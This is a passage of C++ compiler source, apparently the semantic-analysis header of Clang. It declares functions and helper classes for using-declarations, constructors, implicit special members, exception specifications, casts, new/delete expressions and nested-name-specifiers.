/// library, an check the VarDecls possibly returned by the operator<=>
/// builtins for that type.
///
/// \return The type of the comparison category type corresponding to the
/// specified Kind, or a null type if an error occurs
QualType CheckComparisonCategoryType(ComparisonCategoryType Kind,
SourceLocation Loc,
ComparisonCategoryUsage Usage);
/// Tests whether Ty is an instance of std::initializer_list and, if
/// it is and Element is not NULL, assigns the element type to Element.
bool isStdInitializerList(QualType Ty, QualType *Element);
/// Looks for the std::initializer_list template and instantiates it
/// with Element, or emits an error if it's not found.
///
/// \returns The instantiated template, or null on error.
QualType BuildStdInitializerList(QualType Element, SourceLocation Loc);
/// Determine whether Ctor is an initializer-list constructor, as
/// defined in [dcl.init.list]p2.
bool isInitListConstructor(const FunctionDecl *Ctor);
Decl *ActOnUsingDirective(Scope *CurScope, SourceLocation UsingLoc,
SourceLocation NamespcLoc, CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *NamespcName,
const ParsedAttributesView &AttrList);
void PushUsingDirective(Scope *S, UsingDirectiveDecl *UDir);
Decl *ActOnNamespaceAliasDef(Scope *CurScope,
SourceLocation NamespaceLoc,
SourceLocation AliasLoc,
IdentifierInfo *Alias,
CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *Ident);
void HideUsingShadowDecl(Scope *S, UsingShadowDecl *Shadow);
bool CheckUsingShadowDecl(UsingDecl *UD, NamedDecl *Target,
const LookupResult &PreviousDecls,
UsingShadowDecl *&PrevShadow);
UsingShadowDecl *BuildUsingShadowDecl(Scope *S, UsingDecl *UD,
NamedDecl *Target,
UsingShadowDecl *PrevDecl);
bool CheckUsingDeclRedeclaration(SourceLocation UsingLoc,
bool HasTypenameKeyword,
const CXXScopeSpec &SS,
SourceLocation NameLoc,
const LookupResult &Previous);
bool CheckUsingDeclQualifier(SourceLocation UsingLoc,
bool HasTypename,
const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
SourceLocation NameLoc);
NamedDecl *BuildUsingDeclaration(
Scope *S, AccessSpecifier AS, SourceLocation UsingLoc,
bool HasTypenameKeyword, SourceLocation TypenameLoc, CXXScopeSpec &SS,
DeclarationNameInfo NameInfo, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList, bool IsInstantiation);
NamedDecl *BuildUsingPackDecl(NamedDecl *InstantiatedFrom,
ArrayRef<NamedDecl *> Expansions);
bool CheckInheritingConstructorUsingDecl(UsingDecl *UD);
/// Given a derived-class using shadow declaration for a constructor and the
/// correspnding base class constructor, find or create the implicit
/// synthesized derived class constructor to use for this initialization.
CXXConstructorDecl *
findInheritingConstructor(SourceLocation Loc, CXXConstructorDecl *BaseCtor,
ConstructorUsingShadowDecl *DerivedShadow);
Decl *ActOnUsingDeclaration(Scope *CurScope, AccessSpecifier AS,
SourceLocation UsingLoc,
SourceLocation TypenameLoc, CXXScopeSpec &SS,
UnqualifiedId &Name, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnAliasDeclaration(Scope *CurScope, AccessSpecifier AS,
MultiTemplateParamsArg TemplateParams,
SourceLocation UsingLoc, UnqualifiedId &Name,
const ParsedAttributesView &AttrList,
TypeResult Type, Decl *DeclFromDeclSpec);
/// BuildCXXConstructExpr - Creates a complete call to a constructor,
/// including handling of its default argument expressions.
///
/// \param ConstructKind - a CXXConstructExpr::ConstructionKind
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
/// Build a CXXConstructExpr whose constructor has already been resolved if
/// it denotes an inherited constructor.
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
// FIXME: Can we remove this and have the above BuildCXXConstructExpr check if
// the constructor can be elidable?
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs, bool HadMultipleCandidates,
bool IsListInitialization,
bool IsStdInitListInitialization, bool RequiresZeroInit,
unsigned ConstructKind, SourceRange ParenRange);
ExprResult BuildCXXDefaultInitExpr(SourceLocation Loc, FieldDecl *Field);
/// Instantiate or parse a C++ default argument expression as necessary.
/// Return true on error.
bool CheckCXXDefaultArgExpr(SourceLocation CallLoc, FunctionDecl *FD,
ParmVarDecl *Param);
/// BuildCXXDefaultArgExpr - Creates a CXXDefaultArgExpr, instantiating
/// the default expr if needed.
ExprResult BuildCXXDefaultArgExpr(SourceLocation CallLoc,
FunctionDecl *FD,
ParmVarDecl *Param);
/// FinalizeVarWithDestructor - Prepare for calling destructor on the
/// constructed variable.
void FinalizeVarWithDestructor(VarDecl *VD, const RecordType *DeclInitType);
/// Helper class that collects exception specifications for
/// implicitly-declared special member functions.
class ImplicitExceptionSpecification {
// Pointer to allow copying
Sema *Self;
// We order exception specifications thus:
// noexcept is the most restrictive, but is only used in C++11.
// throw() comes next.
// Then a throw(collected exceptions)
// Finally no specification, which is expressed as noexcept(false).
// throw(...) is used instead if any called function uses it.
ExceptionSpecificationType ComputedEST;
llvm::SmallPtrSet<CanQualType, 4> ExceptionsSeen;
SmallVector<QualType, 4> Exceptions;
void ClearExceptions() {
ExceptionsSeen.clear();
Exceptions.clear();
}
public:
explicit ImplicitExceptionSpecification(Sema &Self)
: Self(&Self), ComputedEST(EST_BasicNoexcept) {
if (!Self.getLangOpts().CPlusPlus11)
ComputedEST = EST_DynamicNone;
}
/// Get the computed exception specification type.
ExceptionSpecificationType getExceptionSpecType() const {
assert(!isComputedNoexcept(ComputedEST) &&
"noexcept(expr) should not be a possible result");
return ComputedEST;
}
/// The number of exceptions in the exception specification.
unsigned size() const { return Exceptions.size(); }
/// The set of exceptions in the exception specification.
const QualType *data() const { return Exceptions.data(); }
/// Integrate another called method into the collected data.
void CalledDecl(SourceLocation CallLoc, const CXXMethodDecl *Method);
/// Integrate an invoked expression into the collected data.
void CalledExpr(Expr *E) { CalledStmt(E); }
/// Integrate an invoked statement into the collected data.
void CalledStmt(Stmt *S);
/// Overwrite an EPI's exception specification with this
/// computed exception specification.
FunctionProtoType::ExceptionSpecInfo getExceptionSpec() const {
FunctionProtoType::ExceptionSpecInfo ESI;
ESI.Type = getExceptionSpecType();
if (ESI.Type == EST_Dynamic) {
ESI.Exceptions = Exceptions;
} else if (ESI.Type == EST_None) {
/// C++11 [except.spec]p14:
/// The exception-specification is noexcept(false) if the set of
/// potential exceptions of the special member function contains "any"
ESI.Type = EST_NoexceptFalse;
ESI.NoexceptExpr = Self->ActOnCXXBoolLiteral(SourceLocation(),
tok::kw_false).get();
}
return ESI;
}
};
/// Determine what sort of exception specification a defaulted
/// copy constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDefaultCtorExceptionSpec(SourceLocation Loc,
CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// default constructor of a class will have, and whether the parameter
/// will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy assignment operator of a class will have, and whether the
/// parameter will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// assignment operator of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// destructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification an inheriting
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeInheritingCtorExceptionSpec(SourceLocation Loc,
CXXConstructorDecl *CD);
/// Evaluate the implicit exception specification for a defaulted
/// special member function.
void EvaluateImplicitExceptionSpec(SourceLocation Loc, FunctionDecl *FD);
/// Check the given noexcept-specifier, convert its expression, and compute
/// the appropriate ExceptionSpecificationType.
ExprResult ActOnNoexceptSpec(SourceLocation NoexceptLoc, Expr *NoexceptExpr,
ExceptionSpecificationType &EST);
/// Check the given exception-specification and update the
/// exception specification information with the results.
void checkExceptionSpecification(bool IsTopLevel,
ExceptionSpecificationType EST,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr,
SmallVectorImpl<QualType> &Exceptions,
FunctionProtoType::ExceptionSpecInfo &ESI);
/// Determine if we're in a case where we need to (incorrectly) eagerly
/// parse an exception specification to work around a libstdc++ bug.
bool isLibstdcxxEagerExceptionSpecHack(const Declarator &D);
/// Add an exception-specification to the given member function
/// (or member function template). The exception-specification was parsed
/// after the method itself was declared.
void actOnDelayedExceptionSpecification(Decl *Method,
ExceptionSpecificationType EST,
SourceRange SpecificationRange,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr);
class InheritedConstructorInfo;
/// Determine if a special member function should have a deleted
/// definition when it is defaulted.
bool ShouldDeleteSpecialMember(CXXMethodDecl *MD, CXXSpecialMember CSM,
InheritedConstructorInfo *ICI = nullptr,
bool Diagnose = false);
/// Produce notes explaining why a defaulted function was defined as deleted.
void DiagnoseDeletedDefaultedFunction(FunctionDecl *FD);
/// Declare the implicit default constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// default constructor will be added.
///
/// \returns The implicitly-declared default constructor.
CXXConstructorDecl *DeclareImplicitDefaultConstructor(
CXXRecordDecl *ClassDecl);
/// DefineImplicitDefaultConstructor - Checks for feasibility of
/// defining this constructor as the default constructor.
void DefineImplicitDefaultConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit destructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// destructor will be added.
///
/// \returns The implicitly-declared destructor.
CXXDestructorDecl *DeclareImplicitDestructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitDestructor - Checks for feasibility of
/// defining this destructor as the default destructor.
void DefineImplicitDestructor(SourceLocation CurrentLocation,
CXXDestructorDecl *Destructor);
/// Build an exception spec for destructors that don't have one.
///
/// C++11 says that user-defined destructors with no exception spec get one
/// that looks as if the destructor was implicitly declared.
void AdjustDestructorExceptionSpec(CXXDestructorDecl *Destructor);
/// Define the specified inheriting constructor.
void DefineInheritingConstructor(SourceLocation UseLoc,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy constructor will be added.
///
/// \returns The implicitly-declared copy constructor.
CXXConstructorDecl *DeclareImplicitCopyConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitCopyConstructor - Checks for feasibility of
/// defining this constructor as the copy constructor.
void DefineImplicitCopyConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit move constructor for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move constructor will be added.
///
/// \returns The implicitly-declared move constructor, or NULL if it wasn't
/// declared.
CXXConstructorDecl *DeclareImplicitMoveConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitMoveConstructor - Checks for feasibility of
/// defining this constructor as the move constructor.
void DefineImplicitMoveConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy assignment operator will be added.
///
/// \returns The implicitly-declared copy assignment operator.
CXXMethodDecl *DeclareImplicitCopyAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared copy assignment operator.
void DefineImplicitCopyAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Declare the implicit move assignment operator for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move assignment operator will be added.
///
/// \returns The implicitly-declared move assignment operator, or NULL if it
/// wasn't declared.
CXXMethodDecl *DeclareImplicitMoveAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared move assignment operator.
void DefineImplicitMoveAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Force the declaration of any implicitly-declared members of this
/// class.
void ForceDeclarationOfImplicitMembers(CXXRecordDecl *Class);
/// Check a completed declaration of an implicit special member.
void CheckImplicitSpecialMemberDeclaration(Scope *S, FunctionDecl *FD);
/// Determine whether the given function is an implicitly-deleted
/// special member function.
bool isImplicitlyDeleted(FunctionDecl *FD);
/// Check whether 'this' shows up in the type of a static member
/// function after the (naturally empty) cv-qualifier-seq would be.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionType(CXXMethodDecl *Method);
/// Whether this' shows up in the exception specification of a static
/// member function.
bool checkThisInStaticMemberFunctionExceptionSpec(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the attributes of the given
/// static member function.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionAttributes(CXXMethodDecl *Method);
/// MaybeBindToTemporary - If the passed in expression has a record type with
/// a non-trivial destructor, this will return CXXBindTemporaryExpr. Otherwise
/// it simply returns the passed in expression.
ExprResult MaybeBindToTemporary(Expr *E);
bool CompleteConstructorCall(CXXConstructorDecl *Constructor,
MultiExprArg ArgsPtr,
SourceLocation Loc,
SmallVectorImpl<Expr*> &ConvertedArgs,
bool AllowExplicit = false,
bool IsListInitialization = false);
ParsedType getInheritingConstructorName(CXXScopeSpec &SS,
SourceLocation NameLoc,
IdentifierInfo &Name);
ParsedType getConstructorName(IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
bool EnteringContext);
ParsedType getDestructorName(SourceLocation TildeLoc,
IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext);
ParsedType getDestructorTypeForDecltype(const DeclSpec &DS,
ParsedType ObjectType);
// Checks that reinterpret casts don't have undefined behavior.
void CheckCompatibleReinterpretCast(QualType SrcType, QualType DestType,
bool IsDereference, SourceRange Range);
/// ActOnCXXNamedCast - Parse {dynamic,static,reinterpret,const}_cast's.
ExprResult ActOnCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
SourceLocation LAngleBracketLoc,
Declarator &D,
SourceLocation RAngleBracketLoc,
SourceLocation LParenLoc,
Expr *E,
SourceLocation RParenLoc);
ExprResult BuildCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
TypeSourceInfo *Ty,
Expr *E,
SourceRange AngleBrackets,
SourceRange Parens);
ExprResult ActOnBuiltinBitCastExpr(SourceLocation KWLoc, Declarator &Dcl,
ExprResult Operand,
SourceLocation RParenLoc);
ExprResult BuildBuiltinBitCastExpr(SourceLocation KWLoc, TypeSourceInfo *TSI,
Expr *Operand, SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXTypeid - Parse typeid( something ).
ExprResult ActOnCXXTypeid(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXUuidof - Parse __uuidof( something ).
ExprResult ActOnCXXUuidof(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
/// Handle a C++1z fold-expression: ( expr op ... op expr ).
ExprResult ActOnCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
tok::TokenKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc);
ExprResult BuildCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
BinaryOperatorKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc,
Optional<unsigned> NumExpansions);
ExprResult BuildEmptyCXXFoldExpr(SourceLocation EllipsisLoc,
BinaryOperatorKind Operator);
//// ActOnCXXThis - Parse 'this' pointer.
ExprResult ActOnCXXThis(SourceLocation loc);
/// Build a CXXThisExpr and mark it referenced in the current context.
Expr *BuildCXXThisExpr(SourceLocation Loc, QualType Type, bool IsImplicit);
void MarkThisReferenced(CXXThisExpr *This);
/// Try to retrieve the type of the 'this' pointer.
///
/// \returns The type of 'this', if possible. Otherwise, returns a NULL type.
QualType getCurrentThisType();
/// When non-NULL, the C++ 'this' expression is allowed despite the
/// current context not being a non-static member function. In such cases,
/// this provides the type used for 'this'.
QualType CXXThisTypeOverride;
/// RAII object used to temporarily allow the C++ 'this' expression
/// to be used, with the given qualifiers on the current class type.
class CXXThisScopeRAII {
Sema &S;
QualType OldCXXThisTypeOverride;
bool Enabled;
public:
/// Introduce a new scope where 'this' may be allowed (when enabled),
/// using the given declaration (which is either a class template or a
/// class) along with the given qualifiers.
/// along with the qualifiers placed on '*this'.
CXXThisScopeRAII(Sema &S, Decl *ContextDecl, Qualifiers CXXThisTypeQuals,
bool Enabled = true);
~CXXThisScopeRAII();
};
/// Make sure the value of 'this' is actually available in the current
/// context, if it is a potentially evaluated context.
///
/// \param Loc The location at which the capture of 'this' occurs.
///
/// \param Explicit Whether 'this' is explicitly captured in a lambda
/// capture list.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// 'this' that may or may not be used in certain specializations of
/// a nested generic lambda (depending on whether the name resolves to
/// a non-static member function or a static function).
/// \return returns 'true' if failed, 'false' if success.
bool CheckCXXThisCapture(SourceLocation Loc, bool Explicit = false,
bool BuildAndDiagnose = true,
const unsigned *const FunctionScopeIndexToStopAt = nullptr,
bool ByCopy = false);
/// Determine whether the given type is the type of *this that is used
/// outside of the body of a member function for a type that is currently
/// being defined.
bool isThisOutsideMemberFunctionBody(QualType BaseType);
/// ActOnCXXBoolLiteral - Parse {true,false} literals.
ExprResult ActOnCXXBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
/// ActOnObjCBoolLiteral - Parse {__objc_yes,__objc_no} literals.
ExprResult ActOnObjCBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
ExprResult
ActOnObjCAvailabilityCheckExpr(llvm::ArrayRef<AvailabilitySpec> AvailSpecs,
SourceLocation AtLoc, SourceLocation RParen);
/// ActOnCXXNullPtrLiteral - Parse 'nullptr'.
ExprResult ActOnCXXNullPtrLiteral(SourceLocation Loc);
//// ActOnCXXThrow - Parse throw expressions.
ExprResult ActOnCXXThrow(Scope *S, SourceLocation OpLoc, Expr *expr);
ExprResult BuildCXXThrow(SourceLocation OpLoc, Expr *Ex,
bool IsThrownVarInScope);
bool CheckCXXThrowOperand(SourceLocation ThrowLoc, QualType ThrowTy, Expr *E);
/// ActOnCXXTypeConstructExpr - Parse construction of a specified type.
/// Can be interpreted either as function-style casting ("int(x)")
/// or class type construction ("ClassType(x,y,z)")
/// or creation of a value-initialized type ("int()").
ExprResult ActOnCXXTypeConstructExpr(ParsedType TypeRep,
SourceLocation LParenOrBraceLoc,
MultiExprArg Exprs,
SourceLocation RParenOrBraceLoc,
bool ListInitialization);
ExprResult BuildCXXTypeConstructExpr(TypeSourceInfo *Type,
SourceLocation LParenLoc,
MultiExprArg Exprs,
SourceLocation RParenLoc,
bool ListInitialization);
/// ActOnCXXNew - Parsed a C++ 'new' expression.
ExprResult ActOnCXXNew(SourceLocation StartLoc, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens, Declarator &D,
Expr *Initializer);
ExprResult BuildCXXNew(SourceRange Range, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens,
QualType AllocType,
TypeSourceInfo *AllocTypeInfo,
Optional<Expr *> ArraySize,
SourceRange DirectInitRange,
Expr *Initializer);
/// Determine whether \p FD is an aligned allocation or deallocation
/// function that is unavailable.
bool isUnavailableAlignedAllocationFunction(const FunctionDecl &FD) const;
/// Produce diagnostics if \p FD is an aligned allocation or deallocation
/// function that is unavailable.
void diagnoseUnavailableAlignedAllocation(const FunctionDecl &FD,
SourceLocation Loc);
bool CheckAllocatedType(QualType AllocType, SourceLocation Loc,
SourceRange R);
/// The scope in which to find allocation functions.
enum AllocationFunctionScope {
/// Only look for allocation functions in the global scope.
AFS_Global,
/// Only look for allocation functions in the scope of the
/// allocated class.
AFS_Class,
/// Look for allocation functions in both the global scope
/// and in the scope of the allocated class.
AFS_Both
};
/// Finds the overloads of operator new and delete that are appropriate
/// for the allocation.
bool FindAllocationFunctions(SourceLocation StartLoc, SourceRange Range,
AllocationFunctionScope NewScope,
AllocationFunctionScope DeleteScope,
QualType AllocType, bool IsArray,
bool &PassAlignment, MultiExprArg PlaceArgs,
FunctionDecl *&OperatorNew,
FunctionDecl *&OperatorDelete,
bool Diagnose = true);
void DeclareGlobalNewDelete();
void DeclareGlobalAllocationFunction(DeclarationName Name, QualType Return,
ArrayRef<QualType> Params);
bool FindDeallocationFunction(SourceLocation StartLoc, CXXRecordDecl *RD,
DeclarationName Name, FunctionDecl* &Operator,
bool Diagnose = true);
FunctionDecl *FindUsualDeallocationFunction(SourceLocation StartLoc,
bool CanProvideSize,
bool Overaligned,
DeclarationName Name);
FunctionDecl *FindDeallocationFunctionForDestructor(SourceLocation StartLoc,
CXXRecordDecl *RD);
/// ActOnCXXDelete - Parsed a C++ 'delete' expression
ExprResult ActOnCXXDelete(SourceLocation StartLoc,
bool UseGlobal, bool ArrayForm,
Expr *Operand);
void CheckVirtualDtorCall(CXXDestructorDecl *dtor, SourceLocation Loc,
bool IsDelete, bool CallCanBeVirtual,
bool WarnOnNonAbstractTypes,
SourceLocation DtorLoc);
ExprResult ActOnNoexceptExpr(SourceLocation KeyLoc, SourceLocation LParen,
Expr *Operand, SourceLocation RParen);
ExprResult BuildCXXNoexceptExpr(SourceLocation KeyLoc, Expr *Operand,
SourceLocation RParen);
/// Parsed one of the type trait support pseudo-functions.
ExprResult ActOnTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<ParsedType> Args,
SourceLocation RParenLoc);
ExprResult BuildTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<TypeSourceInfo *> Args,
SourceLocation RParenLoc);
/// ActOnArrayTypeTrait - Parsed one of the binary type trait support
/// pseudo-functions.
ExprResult ActOnArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
ParsedType LhsTy,
Expr *DimExpr,
SourceLocation RParen);
ExprResult BuildArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
TypeSourceInfo *TSInfo,
Expr *DimExpr,
SourceLocation RParen);
/// ActOnExpressionTrait - Parsed one of the unary type trait support
/// pseudo-functions.
ExprResult ActOnExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult BuildExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult ActOnStartCXXMemberReference(Scope *S,
Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
ParsedType &ObjectType,
bool &MayBePseudoDestructor);
ExprResult BuildPseudoDestructorExpr(Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
const CXXScopeSpec &SS,
TypeSourceInfo *ScopeType,
SourceLocation CCLoc,
SourceLocation TildeLoc,
PseudoDestructorTypeStorage DestroyedType);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
UnqualifiedId &FirstTypeName,
SourceLocation CCLoc,
SourceLocation TildeLoc,
UnqualifiedId &SecondTypeName);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
SourceLocation TildeLoc,
const DeclSpec& DS);
/// MaybeCreateExprWithCleanups - If the current full-expression
/// requires any cleanups, surround it with a ExprWithCleanups node.
/// Otherwise, just returns the passed-in expression.
Expr *MaybeCreateExprWithCleanups(Expr *SubExpr);
Stmt *MaybeCreateStmtWithCleanups(Stmt *SubStmt);
ExprResult MaybeCreateExprWithCleanups(ExprResult SubExpr);
MaterializeTemporaryExpr *
CreateMaterializeTemporaryExpr(QualType T, Expr *Temporary,
bool BoundToLvalueReference);
ExprResult ActOnFinishFullExpr(Expr *Expr, bool DiscardedValue) {
return ActOnFinishFullExpr(
Expr, Expr ? Expr->getExprLoc() : SourceLocation(), DiscardedValue);
}
ExprResult ActOnFinishFullExpr(Expr *Expr, SourceLocation CC,
bool DiscardedValue, bool IsConstexpr = false);
StmtResult ActOnFinishFullStmt(Stmt *Stmt);
// Marks SS invalid if it represents an incomplete type.
bool RequireCompleteDeclContext(CXXScopeSpec &SS, DeclContext *DC);
DeclContext *computeDeclContext(QualType T);
DeclContext *computeDeclContext(const CXXScopeSpec &SS,
bool EnteringContext = false);
bool isDependentScopeSpecifier(const CXXScopeSpec &SS);
CXXRecordDecl *getCurrentInstantiationOf(NestedNameSpecifier *NNS);
/// The parser has parsed a global nested-name-specifier '::'.
///
/// \param CCLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXGlobalScopeSpecifier(SourceLocation CCLoc, CXXScopeSpec &SS);
/// The parser has parsed a '__super' nested-name-specifier.
///
/// \param SuperLoc The location of the '__super' keyword.
///
/// \param ColonColonLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnSuperScopeSpecifier(SourceLocation SuperLoc,
SourceLocation ColonColonLoc, CXXScopeSpec &SS);
bool isAcceptableNestedNameSpecifier(const NamedDecl *SD,
bool *CanCorrect = nullptr);
NamedDecl *FindFirstQualifierInScope(Scope *S, NestedNameSpecifier *NNS);
/// Keeps information about an identifier in a nested-name-spec.
///
struct NestedNameSpecInfo {
/// The type of the object, if we're parsing nested-name-specifier in
/// a member access expression.
ParsedType ObjectType;
/// The identifier preceding the '::'.
IdentifierInfo *Identifier;
/// The location of the identifier.
SourceLocation IdentifierLoc;
/// The location of the '::'.
SourceLocation CCLoc;
/// Creates info object for the most typical case.
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, ParsedType ObjectType = ParsedType())
: ObjectType(ObjectType), Identifier(II), IdentifierLoc(IdLoc),
CCLoc(ColonColonLoc) {
}
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, QualType ObjectType)
: ObjectType(ParsedType::make(ObjectType)), Identifier(II),
IdentifierLoc(IdLoc), CCLoc(ColonColonLoc) {
}
};
bool isNonTypeNestedNameSpecifier(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo);
bool BuildCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
NamedDecl *ScopeLookupResult,
bool ErrorRecoveryLookup,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
/// The parser has parsed a nested-name-specifier 'identifier::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param IdInfo Parser information about an identifier in the
/// nested-name-spec.
///
/// \param EnteringContext Whether we're entering the context nominated by
/// this nested-name-specifier.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param ErrorRecoveryLookup If true, then this method is called to improve
/// error recovery. In this case do not emit error message.
///
/// \param IsCorrectedToColon If not null, suggestions to replace '::' -> ':'
/// are allowed. The bool value pointed by this parameter is set to 'true'
/// if the identifier is treated as if it was followed by ':', not '::'.
///
/// \param OnlyNamespace If true, only considers namespaces in lookup.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
bool ErrorRecoveryLookup = false,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
ExprResult ActOnDecltypeExpression(Expr *E);
bool ActOnCXXNestedNameSpecifierDecltype(CXXScopeSpec &SS,
const DeclSpec &DS,
SourceLocation ColonColonLoc);
bool IsInvalidUnlessNestedName(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo,
bool EnteringContext);
/// The parser has parsed a nested-name-specifier
/// 'template[opt] template-name < template-args >::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param SS The nested-name-specifier, which is both an input
